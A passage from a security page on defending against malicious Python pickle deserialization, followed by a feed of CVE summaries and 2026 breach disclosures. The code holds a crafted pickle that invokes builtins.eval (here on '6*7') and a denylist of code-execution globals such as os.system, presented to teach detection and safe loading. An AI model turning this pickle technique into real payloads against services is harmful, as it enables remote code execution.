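    b"(cbuiltins\n__import__\n(S'builtins'\ntR"
    b"S'eval'\ntR"
    b"(S'6*7'\ntR."
)

DENYLIST = {"builtins.eval", "builtins.exec", "os.system", "subprocess.Popen"}


def referenced_globals(data):
    """module.name pairs imported by GLOBAL / STACK_GLOBAL opcodes."""
    globs, strings = set(), []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            globs.add(f"{module}.{name}")
        elif op.name == "STACK_GLOBAL":
            # Module and name are the two most recent string operands.
            globs.add(f"{strings[-2]}.{strings[-1]}")
        elif isinstance(arg, str):
            strings.append(arg)
    return globs


def naive_scan(data):
    """True when a denylisted global is named directly (the evadable check)."""
    return bool(referenced_globals(data) & DENYLIST)


class RestrictedUnpickler(pickle.Unpickler):
    """Allowlist loader: every global import goes through find_class."""
    ALLOWED = {("builtins", n) for n in ("set", "frozenset", "range", "slice", "complex")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

For an inference API the stronger fix is not a better scanner but a format that has no code path at all (JSON for request bodies, safetensors or similar for weights); `RestrictedUnpickler` is the fallback when pickle cannot be removed.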
| Risk 9.5 / 10 CVE-2026-36418 | 4 hour(s) ago | |
| JimuReport versions 2.3.4 and below are vulnerable to remote code execution due to improper handling of Aviator expressions. The /jmreport/executeSelectApi endpoint passes user-supplied input directly to the Aviator expression engine without adequate validation allowing attackers to execute arbitrary code. | ||
| Risk 2 / 10 CVE-2026-35068 | 4 hour(s) ago | |
| Dell PowerFlex Manager, version(s) [Versions], contain(s) an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability. A low privileged attacker with adjacent network access could potentially exploit this vulnerability, leading to information disclosure. | ||
| Risk 7.5 / 10 CVE-2026-32652 | 4 hour(s) ago | |
| Dell AIOps Collector versions prior to 1.18.3 contain a "Use of Default Credentials" vulnerability. A low privileged attacker with console access could potentially exploit this vulnerability to gain Filesystem access. This vulnerability only affects fresh installations of Collector versions earlier than 1.18.3. Systems that have been upgraded (either manually or automatically) to version 1.18.3 or later are not impacted, even if they were originally installed on an earlier version. | ||
| Risk 5 / 10 CVE-2026-20220 | 4 hour(s) ago | |
| A vulnerability in the web-based management interface of Cisco Crosswork Network Controller could allow an authenticated, remote attacker to execute arbitrary commands on an affected device. This vulnerability is due to insufficient input validation in the configuration template engine of the web-based management interface. An attacker could exploit this vulnerability by sending a crafted request to the affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system in limited areas of the file system. This vulnerability affects only areas of the operating system for which the template user has write permissions. To exploit this vulnerability, the attacker must have valid template user credentials with write permissions. Template users with read permissions cannot exploit this vulnerability. | ||
| Risk 7.5 / 10 CVE-2026-5667 | 8 hour(s) ago | |
| Use of Hard-coded Credentials vulnerability in Mitsubishi Electric Room Air Conditioners (for Japan and outside Japan); Wireless LAN Adapters for Room Air Conditioners (for Japan and outside Japan); Wireless LAN Adapters for Packaged Air Conditioners (for Japan and outside Japan); Refrigerators (for Japan); Heat Pump Water Heaters / HEMS-Compatible Adapters / Wireless LAN Adapters (for Japan); Bathroom Dryer / Heater / Ventilation Systems (for Japan); Adapters for Airflow Ventilation Systems, Heat Pump Chilled / Hot Water Systems, and Ventilation / Air-Conditioning System Air Resorts (for Japan); Lossnay Central Ventilation Systems (for Japan); Smart Switches for Ventilation Fans and Lossnay (for Japan); IH Cooking Heaters (for Japan); and Rice Cookers (for Japan) allows an attacker within Wi-Fi radio range of an affected product to access the affected product using a hard-coded SSID and password, thereby obtaining device data such as operation status, room set temperature, and room temperature; changing the air-conditioner or Wi-Fi settings; or causing Wi-Fi communication to enter a denial-of-service (DoS) condition. | ||
| Risk 5 / 10 CVE-2026-46448 | 1 day(s) ago | |
| ## Affects - Nova: >=18.0.0 <31.3.1, >=32.0.0 <32.2.1, >=33.0.0 <33.0.2 ## Description Erichen from the Institute of Computing Technology, Chinese Academy of Sciences reported that Nova's server create API does not strip internal scheduler hints. An authenticated user can bypass Placement resource claims and scheduling constraint enforcement, including availability zone, host aggregate, and image trait restrictions. The resulting instance has no Placement allocation, which can lead to compute node resource exhaustion and cross-tenant data persistence on NVMe devices after instance deletion. Deployments running Nova 18.0.0 or later are affected. ## Patches - https://review.opendev.org/993604 (2025.1/epoxy) - https://review.opendev.org/993603 (2025.2/flamingo) - https://review.opendev.org/993602 (2026.1/gazpacho) - https://review.opendev.org/993601 (2026.2/hibiscus) ## Credits - Erichen from Institute of Computing Technology, Chinese Academy of Sciences (CVE-2026-46448) | ||
| 15.06.2026 - June 2026 Stealer Logs | 56,278,397 records leaked | |
| Email addresses, Passwords In June 2026, a collection of accumulated stealer logs from various sources was added to HIBP. The corpus comprised 56M unique email addresses across hundreds of millions of stealer log records. The data also contained 124M unique passwords, which have been added to Pwned Passwords and are now searchable. Individuals can view any records captured against their email address in the stealer logs section of their dashboard. Organisations can see logs affecting their domain via the stealer logs API. | ||
| 09.06.2026 - University of Nottingham | 454,635 records leaked | |
| Academic records, Citizenship statuses, Dates of birth, Disabilities, Email addresses, Ethnicities, Genders, IP addresses, Names, Passport numbers, Phone numbers, Physical addresses, Purchases, Salutations, Usernames In June 2026, the University of Nottingham was the target of a cyber attack, later linked to a ShinyHunters "pay or leak" extortion campaign. Tens of gigabytes of data were subsequently published online and included 455k unique email addresses along with extensive personal information including names, addresses, phone numbers, ethnicities, disabilities, passport numbers and information relating to academic enrolments and fee payments. In a post about the incident, the university advised that the breach affected both "current students, and alumni". | ||
| 30.05.2026 - Atlas Menu | 63,926 records leaked | |
| Email addresses, IP addresses, Passwords, Support tickets, Usernames In May 2026, the GTA V and CS2 cheat service Atlas Menu suffered a data breach. An attacker claimed to have gained access to all Atlas systems and published the service's database to a public GitHub repository. The incident exposed 64k unique email addresses along with usernames, IP addresses, support tickets and passwords stored as bcrypt hashes. | ||
| 29.05.2026 - BCD Travel | 396,313 records leaked | |
| Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses, Support tickets In May 2026, the corporate travel management company BCD Travel was claimed as a victim of the ShinyHunters "pay or leak" extortion campaign. Data allegedly obtained from BCD was subsequently published publicly in early June and contained 396k unique email addresses. Other exposed data included names, addresses, phone numbers, job titles and employer names, spanning a variety of different data sets including leads, internal staff and support tickets. | ||
| 23.05.2026 - Baker Distributing | 102,935 records leaked | |
| Email addresses, Names, Phone numbers, Physical addresses, Support tickets In May 2026, the HVAC/R wholesale distributor Baker Distributing Company was added to the ShinyHunters data extortion group's "pay or leak" site. In early June, the group publicly published data they claimed had been obtained from Baker's SharePoint and Salesforce infrastructure including 103k unique email addresses along with names, physical addresses, phone numbers and tickets relating to the company's HVAC contractor customer base. The exposed data was largely corporate contact and support information with limited sensitivity. | ||
| 23.05.2026 - Charter | 4,851,517 records leaked | |
| Email addresses, Job titles, Names, Phone numbers, Physical addresses In May 2026, the telecommunications company Charter Communications (the parent company behind the consumer broadband and cable brand Spectrum) was named by the ShinyHunters group in a "pay or leak" extortion campaign. The group later published the data, which exposed 4.9M unique email addresses along with names, phone numbers and physical addresses. A subset of approximately 85k records originating from an internal employee directory also included job titles. Charter confirmed the incident, but stated that no sensitive personal information or customer proprietary network information (CPNI) was exfiltrated. | ||
| 23.05.2026 - DentaQuest | 2,553,599 records leaked | |
| Dates of birth, Email addresses, Genders, Government issued IDs, Health insurance information, Names, Phone numbers, Physical addresses In May 2026, the dental benefits administrator DentaQuest was the target of a ShinyHunters "pay or leak" extortion campaign that resulted in the group publicly publishing hundreds of gigabytes of data allegedly obtained from the company. The data included 2.6M unique email addresses along with names, addresses and phone numbers. Much of the data appeared in healthcare enrollment files (ASC X12 transaction sets) with some containing Medicaid IDs, while additional data appeared in member records and related files. DentaQuest acknowledged "a cybersecurity incident involving unauthorized access to a limited portion of our network", and advised they had contained the attack and mitigated the threat. | ||
| 05.05.2026 - Cushman & Wakefield | 310,431 records leaked | |
| Email addresses, Job titles, Names, Phone numbers, Physical addresses, Salutations In May 2026, the real estate services firm Cushman & Wakefield was the target of a "pay or leak" extortion campaign by the ShinyHunters group. Following the threat, the group publicly published data they alleged had been obtained from the firm, consisting mostly of C&W email addresses along with tens of thousands of external email addresses and corporate contact records. The exposed data was primarily business information, including names, job titles, company addresses and phone numbers. | ||
| 30.04.2026 - Reborn Gaming | 126 records leaked | |
| Email addresses, IP addresses In April 2026, the gaming community Reborn Gaming suffered a data breach due to a vulnerability in cPanel and WebHost Manager (WHM). The breach exposed 126 unique email addresses along with IP addresses and Steam IDs. Reborn Gaming self-submitted the data to Have I Been Pwned. | ||
| 28.04.2026 - Vimeo | 119,167 records leaked | |
| Email addresses, Names In April 2026, the ShinyHunters extortion group listed Vimeo on their extortion portal as part of their "pay or leak" campaign. They subsequently published hundreds of gigabytes of data, predominantly consisting of video titles, technical data and metadata. The data also included 119k unique email addresses, sometimes accompanied by names. Vimeo attributed the exposure to a breach of Anodot, a third-party analytics vendor, and advised the incident does not include "Vimeo video content, valid user login credentials, or payment card information". | ||
| 26.04.2026 - CTT | 468,124 records leaked | |
| Email addresses, Names, Phone numbers In April 2026, data allegedly obtained from CTT, Portugal's national postal service, was posted to a public hacking forum. The data included 468k unique email addresses along with names, phone numbers and parcel tracking numbers which can be used to retrieve the tracking history of the parcel. | ||
| 24.04.2026 - Udemy | 1,401,259 records leaked | |
| Email addresses, Employers, Job titles, Names, Payment methods, Phone numbers, Physical addresses In April 2026, online training company Udemy was the victim of a "pay or leak" extortion attempt perpetrated by the ShinyHunters group. The data was subsequently leaked publicly and contained 1.4M unique email addresses belonging to customers and instructors. The data also included names, physical addresses, phone numbers, employer information and instructor payout methods including PayPal, cheque and bank transfer. | ||
| 20.04.2026 - ADT | 5,488,888 records leaked | |
| Dates of birth, Email addresses, Names, Partial government issued IDs, Phone numbers, Physical addresses. In April 2026, home security firm ADT confirmed a data breach by ShinyHunters, which listed the company on its website as part of a "pay or leak" extortion attempt. The breach impacted 5.5M unique email addresses along with names, phone numbers and physical addresses. ADT also advised that "in a small percentage of cases, dates of birth and the last four digits of Social Security numbers or Tax IDs were included" and that it had contacted all affected people. |
||
| 20.04.2026 - Aman | 215,563 records leaked | |
| Dates of birth, Email addresses, Genders, Language preferences, Names, Nationalities, Phone numbers, Physical addresses, Spouses names, VIP statuses. In April 2026, the ultra-luxury hotel brand Aman was named by ShinyHunters as the target of a "pay or leak" extortion campaign, with the data allegedly obtained from their Salesforce CRM. The data was subsequently leaked publicly and contained over 200k unique email addresses. Whilst not present on all records, the data also included genders, physical addresses, phone numbers, nationalities, dates of birth, spouse names and VIP status codes. |
||
| 20.04.2026 - Canada Life | 237,810 records leaked | |
| Email addresses, Job titles, Names, Phone numbers, Physical addresses, Salutations, Support tickets. In April 2026, Canada Life was the victim of a "pay or leak" extortion campaign by the ShinyHunters group. The group subsequently published the data, which contained over 200k unique email addresses along with names, phone numbers, physical addresses and, in some cases, customer support tickets. In their disclosure notice, Canada Life advised that "it is a small proportion of our customers who may have been impacted". In the wake of the incident, Canada Life also published an alert cautioning customers to be wary of phishing attacks, a pattern often seen after the public release of breached data. |
||
| 20.04.2026 - Pitney Bowes | 8,243,989 records leaked | |
| Email addresses, Job titles, Names, Phone numbers, Physical addresses. In April 2026, the hacking collective ShinyHunters claimed to have obtained data from Pitney Bowes as part of a broader extortion campaign that also named several other organisations. After negotiations allegedly failed, the group publicly released the data, which included 8.2M unique email addresses along with names, phone numbers and physical addresses. A subset of the data also included Pitney Bowes employee records with job titles. |
||
| 18.04.2026 - Carnival | 7,531,359 records leaked | |
| Dates of birth, Email addresses, Genders, Geographic locations, Loyalty program details, Names, Salutations. In April 2026, the notorious hacking collective ShinyHunters claimed they had obtained a substantial volume of data belonging to the Carnival cruise operator and attempted to extort the organisation to prevent the data from being leaked. The following week, the group published the data publicly; it contained 8.7M records with 7.5M unique email addresses. The data contained fields indicating it related to the Mariner Society loyalty program run by Holland America, a cruise line brand under Carnival, and included names, dates of birth, genders and data relating to status within the loyalty program. Carnival acknowledged a phishing incident involving a single user account and advised they were working to better understand the scope of the unauthorised activity. |
||
| 15.04.2026 - Kemper | 269,299 records leaked | |
| Email addresses, Names, Partial credit card data, Phone numbers, Physical addresses, Purchases. In April 2026, the American insurance holding company Kemper Corporation was named by the ShinyHunters extortion group in a "pay or leak" extortion campaign. The attackers allegedly accessed Kemper's Salesforce environment via social engineering as part of a broader campaign targeting hundreds of organisations using the same method. The group later published tens of gigabytes of data they claimed included internal directory data, Salesforce records and Stripe payment logs. Alongside the 269k unique email addresses were names, phone numbers, physical addresses and partial payment card data including the last 4 digits, expiry dates and card brands. Kemper confirmed the incident and stated they had engaged third-party cybersecurity experts and notified law enforcement. |
||
| 15.04.2026 - Zara | 197,376 records leaked | |
| Email addresses, Geographic locations, Purchases, Support tickets. In April 2026, the fashion brand Zara was among a number of organisations targeted by the ShinyHunters extortion group as part of their "pay or leak" campaign. The group claimed the breach was related to a compromise of the Anodot analytics platform and subsequently published a terabyte of data allegedly including 95M support ticket records. The data contained 197k unique email addresses alongside product SKUs, order IDs and the market the support ticket originated in. Zara's parent company Inditex advised that the incident did not affect passwords or payment information. |
||
| 14.04.2026 - Abrigo | 711,099 records leaked | |
| Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses. In April 2026, the fintech software company Abrigo was targeted in a "pay or leak" extortion attempt by the ShinyHunters group. Shortly after, data allegedly taken from the company's Salesforce instance was published publicly and contained over 700k unique email addresses belonging to both Abrigo staff and external contacts. Whilst separate from the compromise of Abrigo's Salesforce instance via the Drift application connector the previous year, the data fields described in that incident are consistent with the ShinyHunters data, namely "business contact information" including "institution name, employee name, email addresses, and phone numbers". |
||
| 12.04.2026 - Marcus & Millichap | 1,837,078 records leaked | |
| Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses. In April 2026, the commercial real estate brokerage firm Marcus & Millichap was named as one of multiple alleged victims of the ShinyHunters hacking and extortion group. Data alleged to have been obtained from the company was subsequently released publicly and included 1.8M unique email addresses, along with names, phone numbers and employment-related information including employer, job title and physical company address. In their disclosure notice, Marcus & Millichap advised that the data which may have been accessed appeared limited to "company forms, templates, marketing materials, and general contact information". |
||
| 12.04.2026 - Mytheresa | 84,108 records leaked | |
| Email addresses, Names, Partial credit card data, Phone numbers, Physical addresses, Purchases, Salutations. In April 2026, the luxury fashion e-commerce platform Mytheresa was listed as a victim of the ShinyHunters "pay or leak" extortion group. After the ransom deadline passed, the group publicly released the data, which contained 84k unique email addresses. The exposed data also included names, phone numbers, physical addresses, purchases and partial credit card data including card type, last 4 digits and expiry date. |
||
| 10.04.2026 - McGraw Hill | 13,500,136 records leaked | |
| Email addresses, Names, Phone numbers, Physical addresses. In April 2026, education company McGraw Hill confirmed a data breach following an extortion attempt. The company attributed the incident to a Salesforce misconfiguration and stated that it exposed "a limited set of data from a webpage hosted by Salesforce on its platform". More than 100GB of data was later publicly distributed, containing 13.5M unique email addresses across multiple files, with additional fields such as name, physical address and phone number appearing inconsistently across some records. |
||
| 08.04.2026 - 7-Eleven | 185,256 records leaked | |
| Dates of birth, Email addresses, Names, Phone numbers, Physical addresses. In April 2026, 7-Eleven was the victim of a "pay or leak" extortion campaign by ShinyHunters, with the data published later that month. The incident exposed 185k unique email addresses, along with names, physical addresses, dates of birth and phone numbers. A small number of records also contained additional exposed data fields. The company later advised the breach was limited to "certain 7-Eleven systems used to store franchisee documents", a statement consistent with the exposed data. |
||
| 07.04.2026 - My Lovely AI | 106,271 records leaked | |
| Email addresses, Social media profiles. In April 2026, the NSFW AI girlfriend platform My Lovely AI suffered a data breach that exposed over 100k users. The data included user-created prompts and links to the resulting AI-generated images, along with a small number of Discord and X usernames. |
||
| 06.04.2026 - LegionProxy | 10,144 records leaked | |
| Email addresses, Names, Passwords, Purchases. In April 2026, the commercial residential and ISP proxy network LegionProxy suffered a data breach. The incident exposed 10k email addresses, bcrypt password hashes, names and purchases. |
||
| 03.04.2026 - Amtrak | 2,147,679 records leaked | |
| Email addresses, Names, Physical addresses, Support tickets. In April 2026, the hacking group ShinyHunters claimed they had breached Amtrak. The group typically compromises organisations' Salesforce instances before demanding a ransom and later, if not paid, dumping the data publicly. They subsequently published the alleged data, which contained over 2M unique email addresses along with names, physical addresses and customer support records. |
||
| 02.04.2026 - SongTrivia2 | 291,739 records leaked | |
| Auth tokens, Avatars, Email addresses, Names, Passwords, Usernames. In April 2026, the music trivia platform SongTrivia2 suffered a data breach that was subsequently published to a public hacking forum. The data contained a total of 291k unique email addresses sourced from either Google OAuth logins or accounts created on the site, the latter also containing bcrypt password hashes. The data also included names, usernames and avatars. |
||
| 31.03.2026 - Hallmark | 1,736,520 records leaked | |
| Email addresses, Names, Phone numbers, Physical addresses, Support tickets. In March 2026, Hallmark suffered an alleged breach and subsequent extortion after attackers gained access to data stored within Salesforce. The data was later published after the extortion deadline passed, exposing 1.7M unique email addresses across both Hallmark and the Hallmark+ streaming service, along with names, phone numbers, physical addresses and support tickets. |
||
| 27.03.2026 - ZenBusiness | 5,118,184 records leaked | |
| Email addresses, Names, Phone numbers. In March 2026, the hacking and extortion group "ShinyHunters" claimed to have obtained a substantial corpus of data from ZenBusiness, a business formation and compliance platform. The group claimed the data had been exfiltrated from platforms including Snowflake, Mixpanel and Salesforce, and threatened to publish it if a ransom was not paid. The following month, after claiming payment had not been made, ShinyHunters publicly released the data. The collection amounted to many terabytes across thousands of files that appeared to originate from multiple systems and business functions, including leads, support records and other CRM-related data. The data contained approximately 5M unique email addresses, often accompanied by name and phone number depending on the source file. |
||
| 26.03.2026 - BreachForums Version 5 | 339,778 records leaked | |
| Email addresses, Passwords, Usernames. In March 2026, a breach of one of the many iterations of the BreachForums hacking forum, known as "Version 5", was publicly disclosed. The incident exposed 340k unique email addresses along with usernames and Argon2 password hashes. |
||
| 25.03.2026 - Addi | 34,532,941 records leaked | |
| Age groups, Credit scores, Device information, Email addresses, Government issued IDs, Income levels, IP addresses, Latitude and longitude pairs, Names, Phone numbers, Physical addresses, Purchases, Socioeconomic levels. In March 2026, the Colombian fintech company Addi identified unauthorised activity on its platform and advised customers that "it is possible that your personal information may have been compromised". The "pay or leak" extortion group ShinyHunters subsequently claimed responsibility and published a large trove of personal data allegedly obtained from Addi. The data included 34M unique email addresses drawn from credit scoring requests, credit bureau records, customer identity records and email validation logs. It also contained government issued IDs (Cédula de Ciudadanía), estimated income, socioeconomic levels, purchases and other credit-related data points. |
||
| 25.03.2026 - Sound Radix | 292,993 records leaked | |
| Email addresses, Names, Passwords. In March 2026, the audio production tools company Sound Radix disclosed a data breach that they subsequently self-submitted to HIBP. The incident impacted 293k unique email addresses and names. Sound Radix advised that additional data, including hashed passwords, may also have been exposed, and that no financial or credit card information was impacted. |
||
| 19.03.2026 - Berkadia | 305,216 records leaked | |
| Email addresses, Employers, Names, Phone numbers, Physical addresses. In March 2026, the commercial real estate finance company Berkadia was the target of a ShinyHunters "pay or leak" extortion campaign. The group subsequently published data they alleged was taken from Berkadia's Salesforce instance, including over 300k unique email addresses as well as names, physical addresses and phone numbers, among other data. |
||
| 18.03.2026 - Infinite Campus | 137,123 records leaked | |
| Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses, Support tickets, Usernames. In March 2026, the student information system Infinite Campus was targeted in a ShinyHunters "pay or leak" extortion campaign. The group subsequently published data they alleged was taken from Infinite Campus, containing 137k unique email addresses along with names, phone numbers, physical addresses and support tickets. Infinite Campus subsequently sent notifications advising that the exposed data largely consisted of "names and contact information for school staff" and that "the majority is directory information commonly found on school websites". |
||
| 13.03.2026 - Divine Skins | 105,814 records leaked | |
| Email addresses, Purchases, Usernames. In March 2026, the League of Legends custom skins service Divine Skins suffered a data breach. The incident was disclosed via the service's Discord server, where Divine Skins stated that an unauthorised third party had accessed part of its systems, deleted all skins from the database and exposed email addresses and usernames. The data also contained a history of purchases made by users. |
||
| 12.03.2026 - Crunchyroll | 1,195,684 records leaked | |
| Email addresses. In March 2026, the anime streaming service Crunchyroll suffered a data breach alleged to have impacted 6.8M users. The exposed data is reported to have originated from the company's Zendesk support system, where "name, login name, email address, IP address, general geographic location and the contents of the support tickets" were exposed. A subset of 1.2M email addresses from an alleged 2M record dataset being offered for sale was later provided to HIBP. |
||
| 08.03.2026 - Baydöner | 1,266,822 records leaked | |
| Dates of birth, Email addresses, Genders, Geographic locations, Government issued IDs, Names, Passwords, Phone numbers, Purchases. In March 2026, the Turkish restaurant chain Baydöner suffered a data breach which was subsequently published to a public hacking forum. The incident exposed over 1.2M unique email addresses along with names, phone numbers, cities of residence and plaintext passwords. A small number of records also included a Turkish national ID number and date of birth. In their disclosure notice, Baydöner stated that payment and financial data was not affected. |
||
| 06.03.2026 - Aura | 903,080 records leaked | |
| Customer service comments, Email addresses, IP addresses, Names, Phone numbers, Physical addresses. In March 2026, the online safety service Aura disclosed a data breach that exposed 900k unique email addresses. The data was primarily associated with a marketing tool from a previously acquired company, with fewer than 20k active Aura customers affected. Exposed data included names, phone numbers, physical and IP addresses, and customer service notes. Aura advised that no Social Security numbers, passwords or financial information were compromised. |
||
| 04.03.2026 - SUCCESS | 253,510 records leaked | |
| Device information, Email addresses, IP addresses, Names, Passwords, Phone numbers, Physical addresses, Purchases. In March 2026, the personal development and achievement media brand SUCCESS suffered a data breach. The incident exposed 250k unique email addresses along with names, IP addresses, phone numbers and, for a limited number of staff members, bcrypt password hashes. The data also included orders containing physical addresses and the payment method used. In SUCCESS's disclosure notice, they advised their system had also been abused to send offensive newsletters with quotes falsely attributed to contributors. |
||